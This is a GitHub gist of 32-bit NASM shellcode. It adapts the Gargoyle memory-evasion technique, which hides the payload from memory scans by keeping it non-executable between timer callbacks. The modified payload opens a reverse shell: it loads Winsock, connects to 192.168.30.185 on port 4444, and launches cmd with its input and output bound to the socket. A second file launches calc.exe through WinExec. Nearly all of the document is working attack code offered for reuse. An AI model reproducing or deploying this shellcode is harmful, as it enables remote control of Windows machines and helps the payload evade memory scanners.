Skip to content

Instantly share code, notes, and snippets.

@adon90

adon90/setup.nasm

Last active May 18, 2018 09:56
Show Gist options
  • Save adon90/5b505fc1f1c504086504b958cc8685f6 to your computer and use it in GitHub Desktop.
Save adon90/5b505fc1f1c504086504b958cc8685f6 to your computer and use it in GitHub Desktop.
Download ZIP
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
Raw
setup.nasm
BITS 32
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1
.MessageBox: RESD 1
.trampoline_addr: RESD 1
.sleep_handle: RESD 1
.interval: RESD 1
.gadget: RESD 1
.shadow: RESD 2
.stack: RESB 0x10000
.trampoline: RESD 9
ENDSTRUC
; Call me like void (*__cdecl callable)(void* workspace);
mov ebx, [esp+4] ; Configuration in ebx now
lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack"
mov ebp, esp
; If we're initialized, skip to trampoline fixup
mov edx, [ebx + Configuration.initialized]
cmp edx, 0
jne reset_trampoline
; Create the timer
push 0
push 0
push 0
mov ecx, [ebx + Configuration.CreateWaitableTimer]
call ecx
mov [ebx + Configuration.sleep_handle], eax
; Set the timer
push 0
mov ecx, [ebx + Configuration.trampoline_addr]
push ecx
mov ecx, [ebx + Configuration.gadget]
push ecx
mov ecx, [ebx + Configuration.interval]
push ecx
lea ecx, [ebx + Configuration.shadow]
push ecx
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
mov ecx, [ebx + Configuration.SetWaitableTimer]
call ecx
; Set the initialized bit
mov [ebx + Configuration.initialized], dword 1
; Replace the return address on our trampoline
reset_trampoline:
mov ecx, [ebx + Configuration.VirtualProtectEx]
mov [ebx + Configuration.trampoline], ecx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Arbitrary code goes here. Note that the
;;;; default stack is pretty small (65k).
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Pop a MessageBox as example
global _start
section .text
_start:
; Get the windows socket dll name
xor eax, eax
mov ax, 0x3233 ; '\0\023'
push eax
push dword 0x5f327377 ; '_2sw'
push esp
; LoadLibrary
mov ebx, 0x75fb8530 ; LoadLibraryA(libraryname)
call ebx
mov ebp, eax ; winsocket dll handle is saved into ebp
; Get the funtion name: WSAStartUp
xor eax, eax
mov ax, 0x7075 ; '\0\0up'
push eax
push 0x74726174 ; 'trat'
push 0x53415357 ; 'SASW'
push esp
push ebp
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname)
call ebx
; CAll WSAStartUp
xor ebx, ebx
mov bx, 0x0190
sub esp, ebx
push esp
push ebx
call eax ; WSAStartUp(MAKEWORD(2, 2), wsadata_pointer)
; Get the function name: WSASocketA
xor eax, eax
mov ax, 0x4174 ; '\0\0At'
push eax
push 0x656b636f ; 'ekco'
push 0x53415357 ; 'SASW'
push esp
push ebp
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname)
call ebx
; Call WSASocket
xor ebx, ebx
push ebx
push ebx
push ebx
xor ecx, ecx
mov cl, 6
push ecx
inc ebx
push ebx
inc ebx
push ebx
call eax ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
; (unsigned int)NULL, (unsigned int)NULL);
xchg eax, edi ; Save the socket handle into edi
; Get the function name: connect
mov ebx, 0x74636565 ; '\0tce'
shr ebx, 8
push ebx
push 0x6e6e6f63 ; 'nnoc'
push esp
push ebp
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname)
call ebx
; Call connect
push 0xb91ea8c0 ; 0xc0, 0xa8, 0x02, 0x88 = 192.168.30.185
push word 0x5c11 ; 0x115c = port 4444
xor ebx, ebx
add bl, 2
push word bx
mov edx, esp
push byte 16
push edx
push edi
call eax ; connect(s1, (SOCKADDR*) &hax, sizeof(hax) = 16);
; Call CreateProcess with redirected streams
mov edx, 0x646d6363
shr edx, 8
push edx
mov ecx, esp
xor edx, edx
sub esp, 16
mov ebx, esp ; PROCESS_INFORMATION
push edi
push edi
push edi
push edx
push edx
xor eax, eax
inc eax
rol eax, 8
inc eax
push eax
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
xor eax, eax
add al, 44
push eax
mov eax, esp ; STARTUP_INFO
push ebx ; PROCESS_INFORMATION
push eax ; STARTUP_INFO
push edx
push edx
push edx
xor eax, eax
inc eax
push eax
push edx
push edx
push ecx
push edx
mov ebx, 0x75fc6c10 ; CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
call ebx
end:
xor edx, edx
;push eax
;mov eax, 0x75982acf ; ExitProcess(exitcode)
;call eax
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Time to setup tail calls to go down
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Setup arguments for WaitForSingleObjectEx x1
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
push 0 ; Return address never ret'd
; Setup arguments for WaitForSingleObjectEx x2
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Setup arguments for VirtualProtectEx
lea ecx, [ebx + Configuration.shadow]
push ecx
push 2 ; PAGE_READONLY
mov ecx, [ebx + Configuration.setup_length]
push ecx
mov ecx, [ebx + Configuration.setup_addr]
push ecx
push dword 0xffffffff
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Jump to VirtualProtectEx
mov ecx, [ebx + Configuration.VirtualProtectEx]
jmp ecx
Raw
setup.nasm.1
; Hardcoded WinExec to execute calc.exe
xor eax,eax
push eax
push ".exe"
push "calc"
mov eax,esp
push 1
push eax
mov ebx, 0x75fef890; Direccion de WinExec
call ebx
mov esp, ebp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment